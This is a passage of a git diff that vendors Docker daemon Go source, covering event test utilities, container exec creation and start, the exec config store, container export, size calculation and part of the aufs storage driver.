metrics.Register(ns) +} diff --git a/vendor/github.com/docker/docker/daemon/events/testutils/testutils.go b/vendor/github.com/docker/docker/daemon/events/testutils/testutils.go new file mode 100644 index 0000000000..3544446e18 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/events/testutils/testutils.go @@ -0,0 +1,76 @@ +package testutils + +import ( + "fmt" + "regexp" + "strings" + "time" + + "github.com/docker/docker/api/types/events" + timetypes "github.com/docker/docker/api/types/time" +) + +var ( + reTimestamp = `(?P\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}.\d{9}(:?(:?(:?-|\+)\d{2}:\d{2})|Z))` + reEventType = `(?P\w+)` + reAction = `(?P\w+)` + reID = `(?P[^\s]+)` + reAttributes = `(\s\((?P[^\)]+)\))?` + reString 
= fmt.Sprintf(`\A%s\s%s\s%s\s%s%s\z`, reTimestamp, reEventType, reAction, reID, reAttributes) + + // eventCliRegexp is a regular expression that matches all possible event outputs in the cli + eventCliRegexp = regexp.MustCompile(reString) +) + +// ScanMap turns an event string like the default ones formatted in the cli output +// and turns it into map. +func ScanMap(text string) map[string]string { + matches := eventCliRegexp.FindAllStringSubmatch(text, -1) + md := map[string]string{} + if len(matches) == 0 { + return md + } + + names := eventCliRegexp.SubexpNames() + for i, n := range matches[0] { + md[names[i]] = n + } + return md +} + +// Scan turns an event string like the default ones formatted in the cli output +// and turns it into an event message. +func Scan(text string) (*events.Message, error) { + md := ScanMap(text) + if len(md) == 0 { + return nil, fmt.Errorf("text is not an event: %s", text) + } + + f, err := timetypes.GetTimestamp(md["timestamp"], time.Now()) + if err != nil { + return nil, err + } + + t, tn, err := timetypes.ParseTimestamps(f, -1) + if err != nil { + return nil, err + } + + attrs := make(map[string]string) + for _, a := range strings.SplitN(md["attributes"], ", ", -1) { + kv := strings.SplitN(a, "=", 2) + attrs[kv[0]] = kv[1] + } + + tu := time.Unix(t, tn) + return &events.Message{ + Time: t, + TimeNano: tu.UnixNano(), + Type: md["eventType"], + Action: md["action"], + Actor: events.Actor{ + ID: md["id"], + Attributes: attrs, + }, + }, nil +} diff --git a/vendor/github.com/docker/docker/daemon/events_test.go b/vendor/github.com/docker/docker/daemon/events_test.go new file mode 100644 index 0000000000..2dbcc27dfc --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/events_test.go @@ -0,0 +1,94 @@ +package daemon + +import ( + "testing" + "time" + + containertypes "github.com/docker/docker/api/types/container" + eventtypes "github.com/docker/docker/api/types/events" + "github.com/docker/docker/container" + 
"github.com/docker/docker/daemon/events" +) + +func TestLogContainerEventCopyLabels(t *testing.T) { + e := events.New() + _, l, _ := e.Subscribe() + defer e.Evict(l) + + container := &container.Container{ + CommonContainer: container.CommonContainer{ + ID: "container_id", + Name: "container_name", + Config: &containertypes.Config{ + Image: "image_name", + Labels: map[string]string{ + "node": "1", + "os": "alpine", + }, + }, + }, + } + daemon := &Daemon{ + EventsService: e, + } + daemon.LogContainerEvent(container, "create") + + if _, mutated := container.Config.Labels["image"]; mutated { + t.Fatalf("Expected to not mutate the container labels, got %q", container.Config.Labels) + } + + validateTestAttributes(t, l, map[string]string{ + "node": "1", + "os": "alpine", + }) +} + +func TestLogContainerEventWithAttributes(t *testing.T) { + e := events.New() + _, l, _ := e.Subscribe() + defer e.Evict(l) + + container := &container.Container{ + CommonContainer: container.CommonContainer{ + ID: "container_id", + Name: "container_name", + Config: &containertypes.Config{ + Labels: map[string]string{ + "node": "1", + "os": "alpine", + }, + }, + }, + } + daemon := &Daemon{ + EventsService: e, + } + attributes := map[string]string{ + "node": "2", + "foo": "bar", + } + daemon.LogContainerEventWithAttributes(container, "create", attributes) + + validateTestAttributes(t, l, map[string]string{ + "node": "1", + "foo": "bar", + }) +} + +func validateTestAttributes(t *testing.T, l chan interface{}, expectedAttributesToTest map[string]string) { + select { + case ev := <-l: + event, ok := ev.(eventtypes.Message) + if !ok { + t.Fatalf("Unexpected event message: %q", ev) + } + for key, expected := range expectedAttributesToTest { + actual, ok := event.Actor.Attributes[key] + if !ok || actual != expected { + t.Fatalf("Expected value for key %s to be %s, but was %s (event:%v)", key, expected, actual, event) + } + } + case <-time.After(10 * time.Second): + t.Fatalf("LogEvent test timed out") + 
} +} diff --git a/vendor/github.com/docker/docker/daemon/exec.go b/vendor/github.com/docker/docker/daemon/exec.go new file mode 100644 index 0000000000..8197426a33 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/exec.go @@ -0,0 +1,280 @@ +package daemon + +import ( + "fmt" + "io" + "strings" + "time" + + "golang.org/x/net/context" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/errors" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/strslice" + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/exec" + "github.com/docker/docker/libcontainerd" + "github.com/docker/docker/pkg/pools" + "github.com/docker/docker/pkg/signal" + "github.com/docker/docker/pkg/term" + "github.com/docker/docker/utils" +) + +// Seconds to wait after sending TERM before trying KILL +const termProcessTimeout = 10 + +func (d *Daemon) registerExecCommand(container *container.Container, config *exec.Config) { + // Storing execs in container in order to kill them gracefully whenever the container is stopped or removed. + container.ExecCommands.Add(config.ID, config) + // Storing execs in daemon for easy access via Engine API. + d.execCommands.Add(config.ID, config) +} + +// ExecExists looks up the exec instance and returns a bool if it exists or not. +// It will also return the error produced by `getConfig` +func (d *Daemon) ExecExists(name string) (bool, error) { + if _, err := d.getExecConfig(name); err != nil { + return false, err + } + return true, nil +} + +// getExecConfig looks up the exec instance by name. If the container associated +// with the exec instance is stopped or paused, it will return an error. 
+func (d *Daemon) getExecConfig(name string) (*exec.Config, error) { + ec := d.execCommands.Get(name) + + // If the exec is found but its container is not in the daemon's list of + // containers then it must have been deleted, in which case instead of + // saying the container isn't running, we should return a 404 so that + // the user sees the same error now that they will after the + // 5 minute clean-up loop is run which erases old/dead execs. + + if ec != nil { + if container := d.containers.Get(ec.ContainerID); container != nil { + if !container.IsRunning() { + return nil, fmt.Errorf("Container %s is not running: %s", container.ID, container.State.String()) + } + if container.IsPaused() { + return nil, errExecPaused(container.ID) + } + if container.IsRestarting() { + return nil, errContainerIsRestarting(container.ID) + } + return ec, nil + } + } + + return nil, errExecNotFound(name) +} + +func (d *Daemon) unregisterExecCommand(container *container.Container, execConfig *exec.Config) { + container.ExecCommands.Delete(execConfig.ID) + d.execCommands.Delete(execConfig.ID) +} + +func (d *Daemon) getActiveContainer(name string) (*container.Container, error) { + container, err := d.GetContainer(name) + if err != nil { + return nil, err + } + + if !container.IsRunning() { + return nil, errNotRunning{container.ID} + } + if container.IsPaused() { + return nil, errExecPaused(name) + } + if container.IsRestarting() { + return nil, errContainerIsRestarting(container.ID) + } + return container, nil +} + +// ContainerExecCreate sets up an exec in a running container. 
+func (d *Daemon) ContainerExecCreate(name string, config *types.ExecConfig) (string, error) { + container, err := d.getActiveContainer(name) + if err != nil { + return "", err + } + + cmd := strslice.StrSlice(config.Cmd) + entrypoint, args := d.getEntrypointAndArgs(strslice.StrSlice{}, cmd) + + keys := []byte{} + if config.DetachKeys != "" { + keys, err = term.ToBytes(config.DetachKeys) + if err != nil { + err = fmt.Errorf("Invalid escape keys (%s) provided", config.DetachKeys) + return "", err + } + } + + execConfig := exec.NewConfig() + execConfig.OpenStdin = config.AttachStdin + execConfig.OpenStdout = config.AttachStdout + execConfig.OpenStderr = config.AttachStderr + execConfig.ContainerID = container.ID + execConfig.DetachKeys = keys + execConfig.Entrypoint = entrypoint + execConfig.Args = args + execConfig.Tty = config.Tty + execConfig.Privileged = config.Privileged + execConfig.User = config.User + + linkedEnv, err := d.setupLinkedContainers(container) + if err != nil { + return "", err + } + execConfig.Env = utils.ReplaceOrAppendEnvValues(container.CreateDaemonEnvironment(config.Tty, linkedEnv), config.Env) + if len(execConfig.User) == 0 { + execConfig.User = container.Config.User + } + + d.registerExecCommand(container, execConfig) + + d.LogContainerEvent(container, "exec_create: "+execConfig.Entrypoint+" "+strings.Join(execConfig.Args, " ")) + + return execConfig.ID, nil +} + +// ContainerExecStart starts a previously set up exec instance. The +// std streams are set up. +// If ctx is cancelled, the process is terminated. 
+func (d *Daemon) ContainerExecStart(ctx context.Context, name string, stdin io.ReadCloser, stdout io.Writer, stderr io.Writer) (err error) { + var ( + cStdin io.ReadCloser + cStdout, cStderr io.Writer + ) + + ec, err := d.getExecConfig(name) + if err != nil { + return errExecNotFound(name) + } + + ec.Lock() + if ec.ExitCode != nil { + ec.Unlock() + err := fmt.Errorf("Error: Exec command %s has already run", ec.ID) + return errors.NewRequestConflictError(err) + } + + if ec.Running { + ec.Unlock() + return fmt.Errorf("Error: Exec command %s is already running", ec.ID) + } + ec.Running = true + defer func() { + if err != nil { + ec.Running = false + exitCode := 126 + ec.ExitCode = &exitCode + } + }() + ec.Unlock() + + c := d.containers.Get(ec.ContainerID) + logrus.Debugf("starting exec command %s in container %s", ec.ID, c.ID) + d.LogContainerEvent(c, "exec_start: "+ec.Entrypoint+" "+strings.Join(ec.Args, " ")) + + if ec.OpenStdin && stdin != nil { + r, w := io.Pipe() + go func() { + defer w.Close() + defer logrus.Debug("Closing buffered stdin pipe") + pools.Copy(w, stdin) + }() + cStdin = r + } + if ec.OpenStdout { + cStdout = stdout + } + if ec.OpenStderr { + cStderr = stderr + } + + if ec.OpenStdin { + ec.StreamConfig.NewInputPipes() + } else { + ec.StreamConfig.NewNopInputPipe() + } + + p := libcontainerd.Process{ + Args: append([]string{ec.Entrypoint}, ec.Args...), + Env: ec.Env, + Terminal: ec.Tty, + } + + if err := execSetPlatformOpt(c, ec, &p); err != nil { + return err + } + + attachErr := container.AttachStreams(ctx, ec.StreamConfig, ec.OpenStdin, true, ec.Tty, cStdin, cStdout, cStderr, ec.DetachKeys) + + systemPid, err := d.containerd.AddProcess(ctx, c.ID, name, p, ec.InitializeStdio) + if err != nil { + return err + } + ec.Lock() + ec.Pid = systemPid + ec.Unlock() + + select { + case <-ctx.Done(): + logrus.Debugf("Sending TERM signal to process %v in container %v", name, c.ID) + d.containerd.SignalProcess(c.ID, name, int(signal.SignalMap["TERM"])) + 
select { + case <-time.After(termProcessTimeout * time.Second): + logrus.Infof("Container %v, process %v failed to exit within %d seconds of signal TERM - using the force", c.ID, name, termProcessTimeout) + d.containerd.SignalProcess(c.ID, name, int(signal.SignalMap["KILL"])) + case <-attachErr: + // TERM signal worked + } + return fmt.Errorf("context cancelled") + case err := <-attachErr: + if err != nil { + if _, ok := err.(container.DetachError); !ok { + return fmt.Errorf("exec attach failed with error: %v", err) + } + d.LogContainerEvent(c, "exec_detach") + } + } + return nil +} + +// execCommandGC runs a ticker to clean up the daemon references +// of exec configs that are no longer part of the container. +func (d *Daemon) execCommandGC() { + for range time.Tick(5 * time.Minute) { + var ( + cleaned int + liveExecCommands = d.containerExecIds() + ) + for id, config := range d.execCommands.Commands() { + if config.CanRemove { + cleaned++ + d.execCommands.Delete(id) + } else { + if _, exists := liveExecCommands[id]; !exists { + config.CanRemove = true + } + } + } + if cleaned > 0 { + logrus.Debugf("clean %d unused exec commands", cleaned) + } + } +} + +// containerExecIds returns a list of all the current exec ids that are in use +// and running inside a container. 
+func (d *Daemon) containerExecIds() map[string]struct{} { + ids := map[string]struct{}{} + for _, c := range d.containers.List() { + for _, id := range c.ExecCommands.List() { + ids[id] = struct{}{} + } + } + return ids +} diff --git a/vendor/github.com/docker/docker/daemon/exec/exec.go b/vendor/github.com/docker/docker/daemon/exec/exec.go new file mode 100644 index 0000000000..933136f965 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/exec/exec.go @@ -0,0 +1,118 @@ +package exec + +import ( + "runtime" + "sync" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/container/stream" + "github.com/docker/docker/libcontainerd" + "github.com/docker/docker/pkg/stringid" +) + +// Config holds the configurations for execs. The Daemon keeps +// track of both running and finished execs so that they can be +// examined both during and after completion. +type Config struct { + sync.Mutex + StreamConfig *stream.Config + ID string + Running bool + ExitCode *int + OpenStdin bool + OpenStderr bool + OpenStdout bool + CanRemove bool + ContainerID string + DetachKeys []byte + Entrypoint string + Args []string + Tty bool + Privileged bool + User string + Env []string + Pid int +} + +// NewConfig initializes the a new exec configuration +func NewConfig() *Config { + return &Config{ + ID: stringid.GenerateNonCryptoID(), + StreamConfig: stream.NewConfig(), + } +} + +// InitializeStdio is called by libcontainerd to connect the stdio. +func (c *Config) InitializeStdio(iop libcontainerd.IOPipe) error { + c.StreamConfig.CopyToPipe(iop) + + if c.StreamConfig.Stdin() == nil && !c.Tty && runtime.GOOS == "windows" { + if iop.Stdin != nil { + if err := iop.Stdin.Close(); err != nil { + logrus.Errorf("error closing exec stdin: %+v", err) + } + } + } + + return nil +} + +// CloseStreams closes the stdio streams for the exec +func (c *Config) CloseStreams() error { + return c.StreamConfig.CloseStreams() +} + +// Store keeps track of the exec configurations. 
+type Store struct { + commands map[string]*Config + sync.RWMutex +} + +// NewStore initializes a new exec store. +func NewStore() *Store { + return &Store{commands: make(map[string]*Config, 0)} +} + +// Commands returns the exec configurations in the store. +func (e *Store) Commands() map[string]*Config { + e.RLock() + commands := make(map[string]*Config, len(e.commands)) + for id, config := range e.commands { + commands[id] = config + } + e.RUnlock() + return commands +} + +// Add adds a new exec configuration to the store. +func (e *Store) Add(id string, Config *Config) { + e.Lock() + e.commands[id] = Config + e.Unlock() +} + +// Get returns an exec configuration by its id. +func (e *Store) Get(id string) *Config { + e.RLock() + res := e.commands[id] + e.RUnlock() + return res +} + +// Delete removes an exec configuration from the store. +func (e *Store) Delete(id string) { + e.Lock() + delete(e.commands, id) + e.Unlock() +} + +// List returns the list of exec ids in the store. +func (e *Store) List() []string { + var IDs []string + e.RLock() + for id := range e.commands { + IDs = append(IDs, id) + } + e.RUnlock() + return IDs +} diff --git a/vendor/github.com/docker/docker/daemon/exec_linux.go b/vendor/github.com/docker/docker/daemon/exec_linux.go new file mode 100644 index 0000000000..5aeedc3470 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/exec_linux.go @@ -0,0 +1,27 @@ +package daemon + +import ( + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/caps" + "github.com/docker/docker/daemon/exec" + "github.com/docker/docker/libcontainerd" + "github.com/opencontainers/runtime-spec/specs-go" +) + +func execSetPlatformOpt(c *container.Container, ec *exec.Config, p *libcontainerd.Process) error { + if len(ec.User) > 0 { + uid, gid, additionalGids, err := getUser(c, ec.User) + if err != nil { + return err + } + p.User = &specs.User{ + UID: uid, + GID: gid, + AdditionalGids: additionalGids, + } + } + if ec.Privileged { + 
p.Capabilities = caps.GetAllCapabilities() + } + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/exec_solaris.go b/vendor/github.com/docker/docker/daemon/exec_solaris.go new file mode 100644 index 0000000000..7003355d91 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/exec_solaris.go @@ -0,0 +1,11 @@ +package daemon + +import ( + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/exec" + "github.com/docker/docker/libcontainerd" +) + +func execSetPlatformOpt(c *container.Container, ec *exec.Config, p *libcontainerd.Process) error { + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/exec_windows.go b/vendor/github.com/docker/docker/daemon/exec_windows.go new file mode 100644 index 0000000000..1d6974cda9 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/exec_windows.go @@ -0,0 +1,14 @@ +package daemon + +import ( + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/exec" + "github.com/docker/docker/libcontainerd" +) + +func execSetPlatformOpt(c *container.Container, ec *exec.Config, p *libcontainerd.Process) error { + // Process arguments need to be escaped before sending to OCI. + p.Args = escapeArgs(p.Args) + p.User.Username = ec.User + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/export.go b/vendor/github.com/docker/docker/daemon/export.go new file mode 100644 index 0000000000..5ef6dbb0e5 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/export.go @@ -0,0 +1,60 @@ +package daemon + +import ( + "fmt" + "io" + "runtime" + + "github.com/docker/docker/container" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/ioutils" +) + +// ContainerExport writes the contents of the container to the given +// writer. An error is returned if the container cannot be found. 
+func (daemon *Daemon) ContainerExport(name string, out io.Writer) error { + if runtime.GOOS == "windows" { + return fmt.Errorf("the daemon on this platform does not support export of a container") + } + + container, err := daemon.GetContainer(name) + if err != nil { + return err + } + + data, err := daemon.containerExport(container) + if err != nil { + return fmt.Errorf("Error exporting container %s: %v", name, err) + } + defer data.Close() + + // Stream the entire contents of the container (basically a volatile snapshot) + if _, err := io.Copy(out, data); err != nil { + return fmt.Errorf("Error exporting container %s: %v", name, err) + } + return nil +} + +func (daemon *Daemon) containerExport(container *container.Container) (io.ReadCloser, error) { + if err := daemon.Mount(container); err != nil { + return nil, err + } + + uidMaps, gidMaps := daemon.GetUIDGIDMaps() + archive, err := archive.TarWithOptions(container.BaseFS, &archive.TarOptions{ + Compression: archive.Uncompressed, + UIDMaps: uidMaps, + GIDMaps: gidMaps, + }) + if err != nil { + daemon.Unmount(container) + return nil, err + } + arch := ioutils.NewReadCloserWrapper(archive, func() error { + err := archive.Close() + daemon.Unmount(container) + return err + }) + daemon.LogContainerEvent(container, "export") + return arch, err +} diff --git a/vendor/github.com/docker/docker/daemon/getsize_unix.go b/vendor/github.com/docker/docker/daemon/getsize_unix.go new file mode 100644 index 0000000000..707323a4bf --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/getsize_unix.go @@ -0,0 +1,41 @@ +// +build linux freebsd solaris + +package daemon + +import ( + "github.com/Sirupsen/logrus" + "github.com/docker/docker/container" +) + +// getSize returns the real size & virtual size of the container. 
+func (daemon *Daemon) getSize(container *container.Container) (int64, int64) { + var ( + sizeRw, sizeRootfs int64 + err error + ) + + if err := daemon.Mount(container); err != nil { + logrus.Errorf("Failed to compute size of container rootfs %s: %s", container.ID, err) + return sizeRw, sizeRootfs + } + defer daemon.Unmount(container) + + sizeRw, err = container.RWLayer.Size() + if err != nil { + logrus.Errorf("Driver %s couldn't return diff size of container %s: %s", + daemon.GraphDriverName(), container.ID, err) + // FIXME: GetSize should return an error. Not changing it now in case + // there is a side-effect. + sizeRw = -1 + } + + if parent := container.RWLayer.Parent(); parent != nil { + sizeRootfs, err = parent.Size() + if err != nil { + sizeRootfs = -1 + } else if sizeRw != -1 { + sizeRootfs += sizeRw + } + } + return sizeRw, sizeRootfs +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs.go b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs.go new file mode 100644 index 0000000000..ec55ea4cde --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs.go @@ -0,0 +1,669 @@ +// +build linux + +/* + +aufs driver directory structure + + . 
+ ├── layers // Metadata of layers + │ ├── 1 + │ ├── 2 + │ └── 3 + ├── diff // Content of the layer + │ ├── 1 // Contains layers that need to be mounted for the id + │ ├── 2 + │ └── 3 + └── mnt // Mount points for the rw layers to be mounted + ├── 1 + ├── 2 + └── 3 + +*/ + +package aufs + +import ( + "bufio" + "fmt" + "io" + "io/ioutil" + "os" + "os/exec" + "path" + "path/filepath" + "strings" + "sync" + "syscall" + "time" + + "github.com/Sirupsen/logrus" + "github.com/vbatts/tar-split/tar/storage" + + "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/chrootarchive" + "github.com/docker/docker/pkg/directory" + "github.com/docker/docker/pkg/idtools" + mountpk "github.com/docker/docker/pkg/mount" + + "github.com/opencontainers/runc/libcontainer/label" + rsystem "github.com/opencontainers/runc/libcontainer/system" +) + +var ( + // ErrAufsNotSupported is returned if aufs is not supported by the host. + ErrAufsNotSupported = fmt.Errorf("AUFS was not found in /proc/filesystems") + // ErrAufsNested means aufs cannot be used bc we are in a user namespace + ErrAufsNested = fmt.Errorf("AUFS cannot be used in non-init user namespace") + backingFs = "" + + enableDirpermLock sync.Once + enableDirperm bool +) + +func init() { + graphdriver.Register("aufs", Init) +} + +// Driver contains information about the filesystem mounted. +type Driver struct { + sync.Mutex + root string + uidMaps []idtools.IDMap + gidMaps []idtools.IDMap + ctr *graphdriver.RefCounter + pathCacheLock sync.Mutex + pathCache map[string]string + naiveDiff graphdriver.DiffDriver +} + +// Init returns a new AUFS driver. +// An error is returned if AUFS is not supported. 
+func Init(root string, options []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) { + + // Try to load the aufs kernel module + if err := supportsAufs(); err != nil { + return nil, graphdriver.ErrNotSupported + } + + fsMagic, err := graphdriver.GetFSMagic(root) + if err != nil { + return nil, err + } + if fsName, ok := graphdriver.FsNames[fsMagic]; ok { + backingFs = fsName + } + + switch fsMagic { + case graphdriver.FsMagicAufs, graphdriver.FsMagicBtrfs, graphdriver.FsMagicEcryptfs: + logrus.Errorf("AUFS is not supported over %s", backingFs) + return nil, graphdriver.ErrIncompatibleFS + } + + paths := []string{ + "mnt", + "diff", + "layers", + } + + a := &Driver{ + root: root, + uidMaps: uidMaps, + gidMaps: gidMaps, + pathCache: make(map[string]string), + ctr: graphdriver.NewRefCounter(graphdriver.NewFsChecker(graphdriver.FsMagicAufs)), + } + + rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps) + if err != nil { + return nil, err + } + // Create the root aufs driver dir and return + // if it already exists + // If not populate the dir structure + if err := idtools.MkdirAllAs(root, 0700, rootUID, rootGID); err != nil { + if os.IsExist(err) { + return a, nil + } + return nil, err + } + + if err := mountpk.MakePrivate(root); err != nil { + return nil, err + } + + // Populate the dir structure + for _, p := range paths { + if err := idtools.MkdirAllAs(path.Join(root, p), 0700, rootUID, rootGID); err != nil { + return nil, err + } + } + + a.naiveDiff = graphdriver.NewNaiveDiffDriver(a, uidMaps, gidMaps) + return a, nil +} + +// Return a nil error if the kernel supports aufs +// We cannot modprobe because inside dind modprobe fails +// to run +func supportsAufs() error { + // We can try to modprobe aufs first before looking at + // proc/filesystems for when aufs is supported + exec.Command("modprobe", "aufs").Run() + + if rsystem.RunningInUserNS() { + return ErrAufsNested + } + + f, err := os.Open("/proc/filesystems") + if err != nil 
{ + return err + } + defer f.Close() + + s := bufio.NewScanner(f) + for s.Scan() { + if strings.Contains(s.Text(), "aufs") { + return nil + } + } + return ErrAufsNotSupported +} + +func (a *Driver) rootPath() string { + return a.root +} + +func (*Driver) String() string { + return "aufs" +} + +// Status returns current information about the filesystem such as root directory, number of directories mounted, etc. +func (a *Driver) Status() [][2]string { + ids, _ := loadIds(path.Join(a.rootPath(), "layers")) + return [][2]string{ + {"Root Dir", a.rootPath()}, + {"Backing Filesystem", backingFs}, + {"Dirs", fmt.Sprintf("%d", len(ids))}, + {"Dirperm1 Supported", fmt.Sprintf("%v", useDirperm())}, + } +} + +// GetMetadata not implemented +func (a *Driver) GetMetadata(id string) (map[string]string, error) { + return nil, nil +} + +// Exists returns true if the given id is registered with +// this driver +func (a *Driver) Exists(id string) bool { + if _, err := os.Lstat(path.Join(a.rootPath(), "layers", id)); err != nil { + return false + } + return true +} + +// CreateReadWrite creates a layer that is writable for use as a container +// file system. 
+func (a *Driver) CreateReadWrite(id, parent string, opts *graphdriver.CreateOpts) error { + return a.Create(id, parent, opts) +} + +// Create three folders for each id +// mnt, layers, and diff +func (a *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) error { + + if opts != nil && len(opts.StorageOpt) != 0 { + return fmt.Errorf("--storage-opt is not supported for aufs") + } + + if err := a.createDirsFor(id); err != nil { + return err + } + // Write the layers metadata + f, err := os.Create(path.Join(a.rootPath(), "layers", id)) + if err != nil { + return err + } + defer f.Close() + + if parent != "" { + ids, err := getParentIDs(a.rootPath(), parent) + if err != nil { + return err + } + + if _, err := fmt.Fprintln(f, parent); err != nil { + return err + } + for _, i := range ids { + if _, err := fmt.Fprintln(f, i); err != nil { + return err + } + } + } + + return nil +} + +// createDirsFor creates two directories for the given id. +// mnt and diff +func (a *Driver) createDirsFor(id string) error { + paths := []string{ + "mnt", + "diff", + } + + rootUID, rootGID, err := idtools.GetRootUIDGID(a.uidMaps, a.gidMaps) + if err != nil { + return err + } + // Directory permission is 0755. + // The path of directories are /mnt/ + // and /diff/ + for _, p := range paths { + if err := idtools.MkdirAllAs(path.Join(a.rootPath(), p, id), 0755, rootUID, rootGID); err != nil { + return err + } + } + return nil +} + +// Helper function to debug EBUSY errors on remove. +func debugEBusy(mountPath string) (out []string, err error) { + // lsof is not part of GNU coreutils. This is a best effort + // attempt to detect offending processes. 
+ c := exec.Command("lsof") + + r, err := c.StdoutPipe() + if err != nil { + return nil, fmt.Errorf("Assigning pipes failed with %v", err) + } + + if err := c.Start(); err != nil { + return nil, fmt.Errorf("Starting %s failed with %v", c.Path, err) + } + + defer func() { + waiterr := c.Wait() + if waiterr != nil && err == nil { + err = fmt.Errorf("Waiting for %s failed with %v", c.Path, waiterr) + } + }() + + sc := bufio.NewScanner(r) + for sc.Scan() { + entry := sc.Text() + if strings.Contains(entry, mountPath) { + out = append(out, entry, "\n") + } + } + + return out, nil +} + +// Remove will unmount and remove the given id. +func (a *Driver) Remove(id string) error { + a.pathCacheLock.Lock() + mountpoint, exists := a.pathCache[id] + a.pathCacheLock.Unlock() + if !exists { + mountpoint = a.getMountpoint(id) + } + + var retries int + for { + mounted, err := a.mounted(mountpoint) + if err != nil { + return err + } + if !mounted { + break + } + + if err := a.unmount(mountpoint); err != nil { + if err != syscall.EBUSY { + return fmt.Errorf("aufs: unmount error: %s: %v", mountpoint, err) + } + if retries >= 5 { + out, debugErr := debugEBusy(mountpoint) + if debugErr == nil { + logrus.Warnf("debugEBusy returned %v", out) + } + return fmt.Errorf("aufs: unmount error after retries: %s: %v", mountpoint, err) + } + // If unmount returns EBUSY, it could be a transient error. Sleep and retry. + retries++ + logrus.Warnf("unmount failed due to EBUSY: retry count: %d", retries) + time.Sleep(100 * time.Millisecond) + continue + } + break + } + + // Atomically remove each directory in turn by first moving it out of the + // way (so that docker doesn't find it anymore) before doing removal of + // the whole tree. 
+ tmpMntPath := path.Join(a.mntPath(), fmt.Sprintf("%s-removing", id)) + if err := os.Rename(mountpoint, tmpMntPath); err != nil && !os.IsNotExist(err) { + if err == syscall.EBUSY { + logrus.Warn("os.Rename err due to EBUSY") + out, debugErr := debugEBusy(mountpoint) + if debugErr == nil { + logrus.Warnf("debugEBusy returned %v", out) + } + } + return err + } + defer os.RemoveAll(tmpMntPath) + + tmpDiffpath := path.Join(a.diffPath(), fmt.Sprintf("%s-removing", id)) + if err := os.Rename(a.getDiffPath(id), tmpDiffpath); err != nil && !os.IsNotExist(err) { + return err + } + defer os.RemoveAll(tmpDiffpath) + + // Remove the layers file for the id + if err := os.Remove(path.Join(a.rootPath(), "layers", id)); err != nil && !os.IsNotExist(err) { + return err + } + + a.pathCacheLock.Lock() + delete(a.pathCache, id) + a.pathCacheLock.Unlock() + return nil +} + +// Get returns the rootfs path for the id. +// This will mount the dir at its given path +func (a *Driver) Get(id, mountLabel string) (string, error) { + parents, err := a.getParentLayerPaths(id) + if err != nil && !os.IsNotExist(err) { + return "", err + } + + a.pathCacheLock.Lock() + m, exists := a.pathCache[id] + a.pathCacheLock.Unlock() + + if !exists { + m = a.getDiffPath(id) + if len(parents) > 0 { + m = a.getMountpoint(id) + } + } + if count := a.ctr.Increment(m); count > 1 { + return m, nil + } + + // If a dir does not have a parent ( no layers )do not try to mount + // just return the diff path to the data + if len(parents) > 0 { + if err := a.mount(id, m, mountLabel, parents); err != nil { + return "", err + } + } + + a.pathCacheLock.Lock() + a.pathCache[id] = m + a.pathCacheLock.Unlock() + return m, nil +} + +// Put unmounts and updates list of active mounts. 
+func (a *Driver) Put(id string) error { + a.pathCacheLock.Lock() + m, exists := a.pathCache[id] + if !exists { + m = a.getMountpoint(id) + a.pathCache[id] = m + } + a.pathCacheLock.Unlock() + if count := a.ctr.Decrement(m); count > 0 { + return nil + } + + err := a.unmount(m) + if err != nil { + logrus.Debugf("Failed to unmount %s aufs: %v", id, err) + } + return err +} + +// isParent returns if the passed in parent is the direct parent of the passed in layer +func (a *Driver) isParent(id, parent string) bool { + parents, _ := getParentIDs(a.rootPath(), id) + if parent == "" && len(parents) > 0 { + return false + } + return !(len(parents) > 0 && parent != parents[0]) +} + +// Diff produces an archive of the changes between the specified +// layer and its parent layer which may be "". +func (a *Driver) Diff(id, parent string) (io.ReadCloser, error) { + if !a.isParent(id, parent) { + return a.naiveDiff.Diff(id, parent) + } + + // AUFS doesn't need the parent layer to produce a diff. + return archive.TarWithOptions(path.Join(a.rootPath(), "diff", id), &archive.TarOptions{ + Compression: archive.Uncompressed, + ExcludePatterns: []string{archive.WhiteoutMetaPrefix + "*", "!" + archive.WhiteoutOpaqueDir}, + UIDMaps: a.uidMaps, + GIDMaps: a.gidMaps, + }) +} + +type fileGetNilCloser struct { + storage.FileGetter +} + +func (f fileGetNilCloser) Close() error { + return nil +} + +// DiffGetter returns a FileGetCloser that can read files from the directory that +// contains files for the layer differences. Used for direct access for tar-split. 
